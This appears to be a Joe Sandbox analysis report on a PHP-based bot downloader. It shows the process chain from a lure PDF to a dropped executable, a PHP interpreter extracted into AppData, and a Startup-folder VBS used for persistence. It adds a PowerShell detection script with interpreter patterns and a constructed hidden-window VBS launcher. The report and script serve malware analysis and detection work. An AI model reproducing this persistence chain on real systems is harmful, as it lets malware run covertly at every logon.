                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Professional_Social_Media_Report.pdf"
                                              Imagebase:0x7ff6bc1b0000
                                              File size:5'641'176 bytes
                                              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:10
                                              Start time:04:44:02
                                              Start date:05/01/2025
                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                              Imagebase:0x7ff74bb60000
                                              File size:3'581'912 bytes
                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:11
                                              Start time:04:44:03
                                              Start date:05/01/2025
                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,17340846460468953801,1805849140092646528,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                              Imagebase:0x7ff74bb60000
                                              File size:3'581'912 bytes
                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:12
                                              Start time:04:44:03
                                              Start date:05/01/2025
                                              Path:C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe"
                                              Imagebase:0x7ff658e20000
                                              File size:273'408 bytes
                                              MD5 hash:F63E0C410E4CA83CDA47BA4871AEAC30
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:19
                                              Start time:04:44:28
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" /C tar -xf "C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip" -C "C:\Users\user\AppData\Roaming"
                                              Imagebase:0x7ff750320000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:20
                                              Start time:04:44:28
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:21
                                              Start time:04:44:28
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\tar.exe
                                              Wow64 process (32bit):false
                                              Commandline:tar -xf "C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip" -C "C:\Users\user\AppData\Roaming"
                                              Imagebase:0x7ff7aa4d0000
                                              File size:54'784 bytes
                                              MD5 hash:3596DC15B6F6CBBB6EC8B143CBD57F24
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:22
                                              Start time:04:44:32
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
                                              Imagebase:0x7ff750320000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:23
                                              Start time:04:44:32
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:24
                                              Start time:04:44:32
                                              Start date:05/01/2025
                                              Path:C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
                                              Imagebase:0x7ff7498c0000
                                              File size:142'336 bytes
                                              MD5 hash:FA544CF95C1B82AFC25B9C5C55C5AD73
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              Has exited:false

                                              Target ID:25
                                              Start time:04:44:49
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs"
                                              Imagebase:0x7ff6a85a0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:26
                                              Start time:04:44:49
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
                                              Imagebase:0x7ff750320000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:27
                                              Start time:04:44:49
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:28
                                              Start time:04:44:49
                                              Start date:05/01/2025
                                              Path:C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
                                              Imagebase:0x7ff7498c0000
                                              File size:142'336 bytes
                                              MD5 hash:FA544CF95C1B82AFC25B9C5C55C5AD73
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false
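
Targets 25 to 28 show the persistence mechanism: PHP-8.2.vbs in the per-user Startup folder relaunches php.exe on php-win.php through cmd.exe at logon, with the interpreter living under %APPDATA%. The function below is an added example for this page, not code from the sample, from Joe Sandbox or from any vendor tool: it enumerates script files in the user and all-users Startup folders and flags those that invoke an interpreter or shell, reference a user-writable path, or use a shell COM object with a hidden window. For an offline run it seeds a temporary folder with a constructed PHP-8.2.vbs whose body is invented to match the process chain in this report (the page does not show the real file's contents); the folder paths, extension list and patterns are the example's own assumptions.

```powershell
# Added example (not the sample's code): hunt the Startup folders for scripts that relaunch an
# interpreter from a user-writable path, the persistence pattern seen in Targets 25-28.

function Find-StartupScriptLaunchers {
    param(
        # Defaults to both Startup folders; override to scan a copied-out folder or another profile.
        [string[]]$Folder = @(
            (Join-Path $env:APPDATA     'Microsoft\Windows\Start Menu\Programs\Startup'),
            (Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu\Programs\StartUp')
        )
    )
    $scriptExt    = '.vbs', '.vbe', '.js', '.jse', '.wsf', '.bat', '.cmd', '.ps1', '.hta'
    # Interpreter/shell patterns (regex) and user-writable roots (literal); extend as needed.
    $interpreters = 'php\.exe', 'python\w*\.exe', 'node\.exe', 'mshta\.exe', 'powershell\.exe',
                    'pwsh\.exe', 'cmd(\.exe)?\s+/c', 'wscript\.exe', 'cscript\.exe'
    $userRoots    = '\AppData\', '\Temp\', '\Users\Public\', '%APPDATA%', '%LOCALAPPDATA%', '%TEMP%'

    foreach ($dir in $Folder) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        foreach ($file in Get-ChildItem -LiteralPath $dir -File) {
            if ($file.Extension.ToLowerInvariant() -notin $scriptExt) { continue }
            $body = Get-Content -LiteralPath $file.FullName -Raw -ErrorAction SilentlyContinue
            if (-not $body) { continue }
            $reasons   = @()
            $hitInterp = $interpreters | Where-Object { $body -match $_ }
            $hitRoot   = $userRoots    | Where-Object { $body -match [regex]::Escape($_) }
            if ($hitInterp) { $reasons += "launches interpreter/shell: $($hitInterp -join ', ')" }
            if ($hitRoot)   { $reasons += "references user-writable path: $($hitRoot -join ', ')" }
            if ($body -match 'WScript\.Shell|Shell\.Application') { $reasons += 'uses a shell COM object' }
            if ($body -match '\.Run\s*\(?.*,\s*0\b') { $reasons += 'runs its target with a hidden window' }
            if ($reasons.Count -eq 0) { continue }
            [pscustomobject]@{
                File    = $file.FullName
                Written = $file.LastWriteTime
                Reasons = $reasons -join '; '
            }
        }
    }
}

function New-ConstructedStartupFolder {
    # Creates a temp folder holding an invented PHP-8.2.vbs that mirrors the chain in this report
    # (wscript -> cmd /c -> php.exe php-win.php). This is NOT the real dropped file.
    $dir = Join-Path ([System.IO.Path]::GetTempPath()) ("startup-demo-" + [guid]::NewGuid())
    New-Item -ItemType Directory -Path $dir | Out-Null
    $php = 'C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64'
    $vbs = @"
Set sh = CreateObject("WScript.Shell")
sh.Run "cmd /c ""$php\php.exe"" ""$php\php-win.php""", 0, False
"@
    Set-Content -LiteralPath (Join-Path $dir 'PHP-8.2.vbs') -Value $vbs
    # A benign control file that must not be reported.
    Set-Content -LiteralPath (Join-Path $dir 'notes.txt') -Value 'not a script'
    return $dir
}

# Offline demonstration on the constructed folder; drop -Folder to scan the live Startup folders.
$demo = New-ConstructedStartupFolder
Find-StartupScriptLaunchers -Folder $demo | Format-List
Remove-Item -LiteralPath $demo -Recurse -Force
```

Treat a hit as a lead, not a verdict: legitimate login scripts also sit in these folders, so follow each flagged file to the binary it launches (here, an unpackaged php.exe extracted by tar into %APPDATA%) before acting on it.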

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1656069939.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1656069939.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 327d81b09ba21dfccb90c17db93b58cf8aaa192511d573d90f2644e54e7cb94a
                                                • Instruction ID: 9c0fea20272bb3caa4426918eac23f3e9b5bf7a5f8508f50c84add899b6fdb5d
                                                • Opcode Fuzzy Hash: 327d81b09ba21dfccb90c17db93b58cf8aaa192511d573d90f2644e54e7cb94a
                                                • Instruction Fuzzy Hash: 77A1A667B0E7E24FEB265BEC58B50D6BFA0EF5726570E00F7C1C5860A3E91929078361
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.1839209835.000001EB15B20000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001EB15B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_1eb15b20000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                • Instruction ID: ab3c8269b8efbb166bca1a8325e3097546d1a1957a860947686773ff3ad6dcb9
                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                • Instruction Fuzzy Hash: 4A9002144DE88E55D41416915C9529E50416388260FD84480481690544D54D13971262
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1835711774.00007FFD9B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B060000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9b060000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e2d25b9b9005b5f175afcc048f3172e1f3f8c42da9bf95366651fa4111d2c04
                                                • Instruction ID: c2574e46b272ec4fb1c0f3c4990599a315b25c29590fb833613d8281a0114a9e
                                                • Opcode Fuzzy Hash: 9e2d25b9b9005b5f175afcc048f3172e1f3f8c42da9bf95366651fa4111d2c04
                                                • Instruction Fuzzy Hash: C0F12762B0FACA4FE7AA966818765B97BD1EF57210B1A02FFD09DC70E3DD086D058341
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1835251364.00007FFD9AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AF90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9af90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fc6dbd5a307579c768b3507b4b8e75d16941c12b3fefabed119a7e64986ddacf
                                                • Instruction ID: a672845da1487320fc7df92b8177206239b7052f1e15f120f4bbeb10bfecae00
                                                • Opcode Fuzzy Hash: fc6dbd5a307579c768b3507b4b8e75d16941c12b3fefabed119a7e64986ddacf
                                                • Instruction Fuzzy Hash: EAD17331A189498FDF98DF5CC495AE9B7E1FFA8304F1442AAE40DD7295DB34E885CB80
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1835711774.00007FFD9B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B060000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9b060000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 44fdbb0b1e819d7d08ac0294f9571d5f5ab44b58f256f0849647a6f5458b950f
                                                • Instruction ID: a5033588f4ded1d9bfd5c4604796b61ddc23bb8050a0095e290366172acd868a
                                                • Opcode Fuzzy Hash: 44fdbb0b1e819d7d08ac0294f9571d5f5ab44b58f256f0849647a6f5458b950f
                                                • Instruction Fuzzy Hash: 86511353B0FBCE5FE3A5966C18621647BD1EF56250B0A02FBD08DC71E7EC096C459391
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1835711774.00007FFD9B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B060000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9b060000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 27485c094e5d0c12b537507d00e5998160a7410271aa1a9ad779de62b62663c9
                                                • Instruction ID: 4709656bbd6a5444b7ca62f118832a5fb918fb48bda70fb818a000a1d82eca69
                                                • Opcode Fuzzy Hash: 27485c094e5d0c12b537507d00e5998160a7410271aa1a9ad779de62b62663c9
                                                • Instruction Fuzzy Hash: 55410563F0FACB4FF7B996A8047627C66C2EF93650B5A42BED45DC70E2DE0CA9055201
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1835251364.00007FFD9AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AF90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9af90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6f79863b2bbfff3587ba3e0f451e06bf8a109e7aa98808b4dde43dabe4b5a22e
                                                • Instruction ID: e74d50138855a209652c384c1a772f3120e048e61d80d25dae7062d5f7516109
                                                • Opcode Fuzzy Hash: 6f79863b2bbfff3587ba3e0f451e06bf8a109e7aa98808b4dde43dabe4b5a22e
                                                • Instruction Fuzzy Hash: 3B01A73121CB0C4FD748EF4CE051AA5B3E0FB99324F10056DE58AC3691D632E892CB41
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1835711774.00007FFD9B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B060000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9b060000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68b737486fc3d5f544e7f9eae1d9bf96ac32f6f5b4f2c117da179f5636a0c16e
                                                • Instruction ID: b7b15230e9a1b07de57c42d913e0ad1685babdb27ab87ca8a74221b5d0e4a1df
                                                • Opcode Fuzzy Hash: 68b737486fc3d5f544e7f9eae1d9bf96ac32f6f5b4f2c117da179f5636a0c16e
                                                • Instruction Fuzzy Hash: 68E06823F0E81D2EE7B4E6DC386D1F862C0DF0566170942B7E80CC309AED00AC200380

                                                Execution Graph

                                                Execution Coverage:9.9%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:1.2%
                                                Total number of Nodes:1526
                                                Total number of Limit Nodes:41
                                                 [Execution graph rendered as a flat node/edge list (node id, virtual address, optional symbol/API labels, an optional "N API calls" summary, and edges as src->dst); the 1526-node listing is omitted here. Recoverable content: the graphed image is the 64-bit module at 0x7ff658e2xxxx, entered at 7ff658e2d974 through the MSVC CRT startup path (__scrt_initialize_crt, __scrt_acquire_startup_lock, __scrt_release_startup_lock, then the application code at 7ff658e210b0); the remaining nodes are UCRT/STL internals (_set_errno_from_matherr, _invalid_parameter_noinfo, _fread_nolock, _Fputc, __free_lconv_mon, try_get_function, Concurrency::details::*, std::ios_base::failure).
                                                 Windows API labels present on the nodes: EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetModuleHandleW, GetModuleHandleExW, GetProcAddress, LoadLibraryExW, FreeLibrary, GetCurrentProcess, TerminateProcess, ExitProcess, GetLastError, GetStartupInfoW, IsProcessorFeaturePresent, MultiByteToWideChar, CreateFileW, CloseHandle, SetStdHandle, TlsFree, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter.
                                                 The IsDebuggerPresent node (7ff658e2dde3) is reached via the __scrt_fastfail chain (7ff658e2dd08 IsProcessorFeaturePresent -> RtlCaptureContext/RtlLookupFunctionEntry -> RtlVirtualUnwind), i.e. the CRT's fail-fast handler, so the "checks if a debugger is running" signature for this image reflects runtime boilerplate rather than a deliberate anti-analysis check.]
15299 7ff658e43134 15298->15299 15300 7ff658e35354 TranslateName 30 API calls 15299->15300 15301 7ff658e43158 15300->15301 15301->15021 15303 7ff658e3c009 15302->15303 15304 7ff658e3c00e 15302->15304 15345 7ff658e3c6b4 15303->15345 15310 7ff658e3c016 15304->15310 15349 7ff658e3c6fc 15304->15349 15315 7ff658e3c090 15310->15315 15371 7ff658e383b8 15310->15371 15311 7ff658e3c040 15313 7ff658e3c05e 15311->15313 15314 7ff658e3c04e 15311->15314 15317 7ff658e3c6fc _Getctype 6 API calls 15313->15317 15316 7ff658e3c6fc _Getctype 6 API calls 15314->15316 15327 7ff658e42b80 15315->15327 15319 7ff658e3c055 15316->15319 15318 7ff658e3c066 15317->15318 15320 7ff658e3c07c 15318->15320 15321 7ff658e3c06a 15318->15321 15361 7ff658e3c1cc 15319->15361 15366 7ff658e3bcd4 15320->15366 15324 7ff658e3c6fc _Getctype 6 API calls 15321->15324 15324->15319 15520 7ff658e42d44 15327->15520 15329 7ff658e42ba9 15535 7ff658e4288c 15329->15535 15332 7ff658e42bc3 15332->15297 15334 7ff658e42c6f 15336 7ff658e3c1cc __free_lconv_mon 13 API calls 15334->15336 15336->15332 15339 7ff658e42c6a 15340 7ff658e35e24 _set_errno_from_matherr 13 API calls 15339->15340 15340->15334 15341 7ff658e42ccc 15341->15334 15560 7ff658e426d0 15341->15560 15342 7ff658e42c8f 15342->15341 15343 7ff658e3c1cc __free_lconv_mon 13 API calls 15342->15343 15343->15341 15380 7ff658e3c328 15345->15380 15350 7ff658e3c328 try_get_function 5 API calls 15349->15350 15351 7ff658e3c72a 15350->15351 15352 7ff658e3c73c TlsSetValue 15351->15352 15353 7ff658e3c02d 15351->15353 15352->15353 15353->15310 15354 7ff658e3c20c 15353->15354 15360 7ff658e3c21d _Getctype 15354->15360 15355 7ff658e3c26e 15392 7ff658e35e24 15355->15392 15356 7ff658e3c252 HeapAlloc 15358 7ff658e3c26c 15356->15358 15356->15360 15358->15311 15360->15355 15360->15356 15389 7ff658e38724 15360->15389 15362 7ff658e3c203 15361->15362 15363 7ff658e3c1d1 HeapFree 15361->15363 15362->15310 15363->15362 15364 7ff658e3c1ec 15363->15364 15365 7ff658e35e24 _set_errno_from_matherr 12 
API calls 15364->15365 15365->15362 15424 7ff658e3bbac 15366->15424 15438 7ff658e41738 15371->15438 15381 7ff658e3c389 TlsGetValue 15380->15381 15387 7ff658e3c384 try_get_function 15380->15387 15382 7ff658e3c46c 15382->15381 15385 7ff658e3c47a GetProcAddress 15382->15385 15383 7ff658e3c3b8 LoadLibraryExW 15384 7ff658e3c3d9 GetLastError 15383->15384 15383->15387 15384->15387 15385->15381 15386 7ff658e3c451 FreeLibrary 15386->15387 15387->15381 15387->15382 15387->15383 15387->15386 15388 7ff658e3c413 LoadLibraryExW 15387->15388 15388->15387 15395 7ff658e38754 15389->15395 15401 7ff658e3c0a0 GetLastError 15392->15401 15394 7ff658e35e2d 15394->15358 15400 7ff658e34f54 EnterCriticalSection 15395->15400 15402 7ff658e3c0c2 15401->15402 15405 7ff658e3c0c7 15401->15405 15403 7ff658e3c6b4 _Getctype 6 API calls 15402->15403 15403->15405 15404 7ff658e3c6fc _Getctype 6 API calls 15406 7ff658e3c0ea 15404->15406 15405->15404 15407 7ff658e3c0cf SetLastError 15405->15407 15406->15407 15408 7ff658e3c20c _Getctype 11 API calls 15406->15408 15407->15394 15410 7ff658e3c0fd 15408->15410 15411 7ff658e3c11b 15410->15411 15412 7ff658e3c10b 15410->15412 15414 7ff658e3c6fc _Getctype 6 API calls 15411->15414 15413 7ff658e3c6fc _Getctype 6 API calls 15412->15413 15415 7ff658e3c112 15413->15415 15416 7ff658e3c123 15414->15416 15419 7ff658e3c1cc __free_lconv_mon 11 API calls 15415->15419 15417 7ff658e3c139 15416->15417 15418 7ff658e3c127 15416->15418 15421 7ff658e3bcd4 _Getctype 11 API calls 15417->15421 15420 7ff658e3c6fc _Getctype 6 API calls 15418->15420 15419->15407 15420->15415 15422 7ff658e3c141 15421->15422 15423 7ff658e3c1cc __free_lconv_mon 11 API calls 15422->15423 15423->15407 15436 7ff658e34f54 EnterCriticalSection 15424->15436 15470 7ff658e416f0 15438->15470 15475 7ff658e34f54 EnterCriticalSection 15470->15475 15521 7ff658e42d67 15520->15521 15522 7ff658e42d71 15521->15522 15571 7ff658e34f54 EnterCriticalSection 15521->15571 15524 7ff658e42de3 15522->15524 15527 7ff658e383b8 
BuildCatchObjectHelperInternal 30 API calls 15522->15527 15524->15329 15528 7ff658e42dfb 15527->15528 15531 7ff658e3bff8 30 API calls 15528->15531 15534 7ff658e42e4e 15528->15534 15532 7ff658e42e38 15531->15532 15533 7ff658e42b80 40 API calls 15532->15533 15533->15534 15534->15329 15572 7ff658e35354 15535->15572 15538 7ff658e428ac GetOEMCP 15540 7ff658e428d3 15538->15540 15539 7ff658e428be 15539->15540 15541 7ff658e428c3 GetACP 15539->15541 15540->15332 15542 7ff658e3f734 15540->15542 15541->15540 15543 7ff658e3f77f 15542->15543 15547 7ff658e3f743 _Getctype 15542->15547 15545 7ff658e35e24 _set_errno_from_matherr 13 API calls 15543->15545 15544 7ff658e3f766 HeapAlloc 15546 7ff658e3f77d 15544->15546 15544->15547 15545->15546 15546->15334 15549 7ff658e42e78 15546->15549 15547->15543 15547->15544 15548 7ff658e38724 std::_Facet_Register 2 API calls 15547->15548 15548->15547 15550 7ff658e4288c 32 API calls 15549->15550 15551 7ff658e42ea3 15550->15551 15553 7ff658e42ee0 IsValidCodePage 15551->15553 15558 7ff658e42f23 __scrt_fastfail 15551->15558 15552 7ff658e2d840 _handle_error 8 API calls 15554 7ff658e42c63 15552->15554 15555 7ff658e42ef1 15553->15555 15553->15558 15554->15339 15554->15342 15556 7ff658e42f28 GetCPInfo 15555->15556 15559 7ff658e42efa __scrt_fastfail 15555->15559 15556->15558 15556->15559 15558->15552 15604 7ff658e4299c 15559->15604 15678 7ff658e34f54 EnterCriticalSection 15560->15678 15573 7ff658e35378 15572->15573 15574 7ff658e35373 15572->15574 15573->15574 15575 7ff658e3bf24 _Getctype 30 API calls 15573->15575 15574->15538 15574->15539 15576 7ff658e35393 15575->15576 15580 7ff658e3ffa4 15576->15580 15581 7ff658e3ffb9 15580->15581 15583 7ff658e353b6 15580->15583 15581->15583 15588 7ff658e44e68 15581->15588 15584 7ff658e3ffd8 15583->15584 15585 7ff658e3ffed 15584->15585 15586 7ff658e40000 15584->15586 15585->15586 15601 7ff658e42e5c 15585->15601 15586->15574 15589 7ff658e3bf24 _Getctype 30 API calls 15588->15589 15590 7ff658e44e77 15589->15590 15591 
7ff658e44ec0 15590->15591 15600 7ff658e34f54 EnterCriticalSection 15590->15600 15591->15583 15602 7ff658e3bf24 _Getctype 30 API calls 15601->15602 15603 7ff658e42e65 15602->15603 15605 7ff658e429d9 GetCPInfo 15604->15605 15614 7ff658e42ad1 15604->15614 15610 7ff658e429ec 15605->15610 15605->15614 15606 7ff658e2d840 _handle_error 8 API calls 15607 7ff658e42b6a 15606->15607 15607->15558 15615 7ff658e40458 15610->15615 15614->15606 15616 7ff658e35354 TranslateName 30 API calls 15615->15616 15617 7ff658e4049a 15616->15617 15635 7ff658e419f4 15617->15635 15636 7ff658e419fc MultiByteToWideChar 15635->15636 15680 7ff658e26321 15679->15680 15681 7ff658e26360 15679->15681 15970 7ff658e2d5b4 EnterCriticalSection 15680->15970 15682 7ff658e2d840 _handle_error 8 API calls 15681->15682 15684 7ff658e26374 15682->15684 15684->15025 15690 7ff658e23a40 std::ios_base::failure::failure 15689->15690 15978 7ff658e28940 15690->15978 15692 7ff658e23a7b Concurrency::details::WorkQueue::IsStructuredEmpty 15692->15027 15694 7ff658e25d51 15693->15694 15695 7ff658e25d90 15693->15695 15697 7ff658e2d5b4 5 API calls 15694->15697 15696 7ff658e2d840 _handle_error 8 API calls 15695->15696 15698 7ff658e25da4 15696->15698 15699 7ff658e25d5d 15697->15699 15698->15029 15699->15695 16082 7ff658e2d414 15699->16082 15704 7ff658e25941 15703->15704 15705 7ff658e25980 15703->15705 15707 7ff658e2d5b4 5 API calls 15704->15707 15706 7ff658e2d840 _handle_error 8 API calls 15705->15706 15708 7ff658e25994 15706->15708 15709 7ff658e2594d 15707->15709 15708->15033 15709->15705 15710 7ff658e2d414 16 API calls 15709->15710 15711 7ff658e25973 15710->15711 15712 7ff658e2d554 4 API calls 15711->15712 15712->15705 15714 7ff658e26121 15713->15714 15715 7ff658e26160 15713->15715 15716 7ff658e2d5b4 5 API calls 15714->15716 15717 7ff658e2d840 _handle_error 8 API calls 15715->15717 15719 7ff658e2612d 15716->15719 15718 7ff658e26174 15717->15718 15718->15037 15719->15715 